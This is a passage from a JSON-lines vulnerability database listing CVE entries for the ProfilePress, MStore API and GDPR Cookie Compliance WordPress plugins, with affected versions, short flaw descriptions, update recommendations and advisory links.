\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L339\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L385\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L385\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3345295\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3345295\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9309b8bf-f581-4a56-a1ed-3941ebb36127?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9309b8bf-f581-4a56-a1ed-3941ebb36127?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12042","slug":"mstore-api","versionImpact":"4.16.4","versionEndExcluding":"4.16.5","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the profile picture upload functionality in all versions up to, and including, 4.16.4 due to insufficient file type validation. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload HTML files with arbitrary web scripts that will execute whenever a user accesses the file.","recommendation":"Update to version 4.16.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/functions\\\/index.php#790\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/functions\\\/index.php#790\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205338\\\/mstore-api\\\/trunk\\\/functions\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205338\\\/mstore-api\\\/trunk\\\/functions\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af468138-c10a-4f9b-b714-0425d52f0210?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af468138-c10a-4f9b-b714-0425d52f0210?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1624","slug":"gdpr-cookie-compliance","versionImpact":"4.15.8","versionEndExcluding":"4.15.9","description":"The GDPR Cookie Compliance  WordPress plugin before 4.15.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f4a402a-97f6-4638-9ce0-456ccd5606e9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f4a402a-97f6-4638-9ce0-456ccd5606e9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1623","slug":"gdpr-cookie-compliance","versionImpact":"4.15.8","versionEndExcluding":"4.15.9","description":"The GDPR Cookie Compliance  WordPress plugin before 4.15.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/40288fa0-50c6-4e13-9b92-968b060d3bf5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/40288fa0-50c6-4e13-9b92-968b060d3bf5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2861","slug":"wp-user-avatar","versionImpact":"4.15.8","versionEndExcluding":"4.15.9","description":"The ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ProfilePress User Panel widget in all versions up to, and including, 4.15.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.15.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/487731cd-da5a-45b6-8f39-4ae6420dd252?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/487731cd-da5a-45b6-8f39-4ae6420dd252?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090831\\\/wp-user-avatar\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090831\\\/wp-user-avatar\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11179","slug":"mstore-api","versionImpact":"4.15.7","versionEndExcluding":"4.15.8","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to SQL Injection via the 'status_type' parameter in all versions up to, and including, 4.15.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.15.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b308bddf-a153-4d5b-936f-2170a1a494a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b308bddf-a153-4d5b-936f-2170a1a494a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.15.5\\\/controllers\\\/helpers\\\/vendor-admin-wcfm-helper.php#L803\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.15.5\\\/controllers\\\/helpers\\\/vendor-admin-wcfm-helper.php#L803\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3190678\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/vendor-admin-wcfm-helper.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3190678\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/vendor-admin-wcfm-helper.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1622","slug":"gdpr-cookie-compliance","versionImpact":"4.15.6","versionEndExcluding":"4.15.7","description":"The GDPR Cookie Compliance  WordPress plugin before 4.15.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a903d61-2792-4fe0-a26b-f400f4a3124b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a903d61-2792-4fe0-a26b-f400f4a3124b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1621","slug":"gdpr-cookie-compliance","versionImpact":"4.15.6","versionEndExcluding":"4.15.7","description":"The GDPR Cookie Compliance  WordPress plugin before 4.15.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c30b9631-2024-4081-9cc5-8294a77c5ebb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c30b9631-2024-4081-9cc5-8294a77c5ebb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1620","slug":"gdpr-cookie-compliance","versionImpact":"4.15.6","versionEndExcluding":"4.15.7","description":"The GDPR Cookie Compliance  WordPress plugin before 4.15.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/923db805-92e7-4489-8e57-374a19f817d7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/923db805-92e7-4489-8e57-374a19f817d7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1619","slug":"gdpr-cookie-compliance","versionImpact":"4.15.6","versionEndExcluding":"4.15.7","description":"The GDPR Cookie Compliance  WordPress plugin before 4.15.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae9bc19d-1634-4501-a258-8c56b2afee88\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae9bc19d-1634-4501-a258-8c56b2afee88\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2205","slug":"gdpr-cookie-compliance","versionImpact":"4.15.6","versionEndExcluding":"4.15.7","description":"The GDPR Cookie Compliance \u2013 Cookie Banner, Cookie Consent, Cookie Notice \u2013 CCPA, DSGVO, RGPD plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.15.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 4.15.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-1622\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-1622\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a903d61-2792-4fe0-a26b-f400f4a3124b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a903d61-2792-4fe0-a26b-f400f4a3124b\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37da32e4-48a1-4830-a47c-c454d60c9811?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37da32e4-48a1-4830-a47c-c454d60c9811?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2867","slug":"wp-user-avatar","versionImpact":"4.15.4","versionEndExcluding":"4.15.5","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title\u2019 parameter in all versions up to, and including, 4.15.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.15.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eb296af-547a-44aa-b804-833204b75256?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eb296af-547a-44aa-b804-833204b75256?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3061186%40wp-user-avatar%2Ftrunk&old=3053353%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3061186%40wp-user-avatar%2Ftrunk&old=3053353%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8269","slug":"mstore-api","versionImpact":"4.15.3","versionEndExcluding":"4.15.4","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to unauthorized user registration in all versions up to, and including, 4.15.3. This is due to the plugin not checking that user registration is enabled prior to creating a user account through the register() function. This makes it possible for unauthenticated attackers to create user accounts on sites, even when user registration is disabled and plugin functionality is not activated.","recommendation":"Update to version 4.15.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59c5b6e7-74b0-430d-8b4a-5a42220f3ec9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59c5b6e7-74b0-430d-8b4a-5a42220f3ec9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.15.2\\\/controllers\\\/flutter-user.php#L406\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.15.2\\\/controllers\\\/flutter-user.php#L406\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.15.2\\\/controllers\\\/flutter-user.php#L454\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.15.2\\\/controllers\\\/flutter-user.php#L454\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147900\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147900\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8242","slug":"mstore-api","versionImpact":"4.15.3","versionEndExcluding":"4.15.4","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the update_user_profile() function in all versions up to, and including, 4.15.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files (not including PHP files) on the affected site's server which may make remote code execution possible. This can be paired with a registration endpoint for unauthenticated users to exploit the issue.","recommendation":"Update to version 4.15.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe3834a6-a6f5-4cc7-951e-a6ada6346b07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe3834a6-a6f5-4cc7-951e-a6ada6346b07?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L1053\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L1053\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147900\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147900\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147900\\\/mstore-api\\\/trunk\\\/functions\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147900\\\/mstore-api\\\/trunk\\\/functions\\\/index.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1535","slug":"wp-user-avatar","versionImpact":"4.15.2","versionEndExcluding":"4.15.3","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.15.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.15.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38ec1a6b-f5ee-446a-9e6c-3485dafb85ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38ec1a6b-f5ee-446a-9e6c-3485dafb85ac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-user-avatar\\\/blob\\\/fde360946c86d67610d8f95a82752199ce25b39a\\\/wp-user-avatar\\\/src\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php#L952\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-user-avatar\\\/blob\\\/fde360946c86d67610d8f95a82752199ce25b39a\\\/wp-user-avatar\\\/src\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php#L952\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047008\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047008\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7628","slug":"mstore-api","versionImpact":"4.15.2","versionEndExcluding":"4.15.3","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 4.15.2. This is due to the use of loose comparison in the 'verify_id_token' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to an @flutter.io email address or phone number. This also requires firebase to be configured on the website and the user to have set up firebase for their account.","recommendation":"Update to version 4.15.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d174f856-d94a-42ed-b547-67699e175cd8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d174f856-d94a-42ed-b547-67699e175cd8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3134553%40mstore-api&new=3134553%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3134553%40mstore-api&new=3134553%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/firebase-phone-auth-helper.php?rev=3110793#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/firebase-phone-auth-helper.php?rev=3110793#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/firebase-phone-auth-helper.php?rev=3110793#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/firebase-phone-auth-helper.php?rev=3110793#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/firebase-phone-auth-helper.php?rev=3110793#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/firebase-phone-auth-helper.php?rev=3110793#L5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13121","slug":"wp-user-avatar","versionImpact":"4.15.19","versionEndExcluding":"4.15.20","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content  WordPress plugin before 4.15.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59ee8fe5-4820-4d52-b17a-7044631c40c1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59ee8fe5-4820-4d52-b17a-7044631c40c1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13120","slug":"wp-user-avatar","versionImpact":"4.15.19","versionEndExcluding":"4.15.20","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content  WordPress plugin before 4.15.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b70798c-c30d-42e6-ac72-821c5568b9b5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b70798c-c30d-42e6-ac72-821c5568b9b5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13119","slug":"wp-user-avatar","versionImpact":"4.15.19","versionEndExcluding":"4.15.20","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content  WordPress plugin before 4.15.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32600a45-a8cd-446c-9aa2-0621a02a9754\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32600a45-a8cd-446c-9aa2-0621a02a9754\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11083","slug":"wp-user-avatar","versionImpact":"4.15.18","versionEndExcluding":"4.15.19","description":"The ProfilePress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.15.18 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 4.15.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197296\\\/wp-user-avatar\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197296\\\/wp-user-avatar\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60c8159f-0641-4b75-9d56-34bd13105caf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60c8159f-0641-4b75-9d56-34bd13105caf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10518","slug":"wp-user-avatar","versionImpact":"4.15.14","versionEndExcluding":"4.15.15","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content  WordPress plugin before 4.15.15 does not sanitise and escape some of its Membership Plan settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1e5ad16-6240-4920-888a-36fbac22cc71\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1e5ad16-6240-4920-888a-36fbac22cc71\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10517","slug":"wp-user-avatar","versionImpact":"4.15.14","versionEndExcluding":"4.15.15","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content  WordPress plugin before 4.15.15 does not sanitise and escape some of its Drag & Drop Builder fields, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7c3a990-458e-4e15-b427-0b37de120740\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7c3a990-458e-4e15-b427-0b37de120740\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1409","slug":"wp-user-avatar","versionImpact":"4.15.0","versionEndExcluding":"4.15.1","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [reg-select-role] shortcode in all versions up to, and including, 4.15.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.15.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53e16bca-7c85-4d56-8233-b3b53f793b39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53e16bca-7c85-4d56-8233-b3b53f793b39?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038677%40wp-user-avatar&new=3038677%40wp-user-avatar&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038677%40wp-user-avatar&new=3038677%40wp-user-avatar&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6328","slug":"mstore-api","versionImpact":"4.14.7","versionEndExcluding":"4.15.0","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 4.14.7. This is due to insufficient verification on the 'phone' parameter of the 'firebase_sms_login' and 'firebase_sms_login_v2' functions. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email address or phone number.  Additionally, if a new email address is supplied, a new user account is created with the default role, even if registration is disabled.","recommendation":"Update to version 4.15.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17d8e2e9-5e3f-433b-be1a-6ea765eba547?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17d8e2e9-5e3f-433b-be1a-6ea765eba547?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L699\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L699\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L714\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L714\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115231\\\/\",\"name\":\"https:\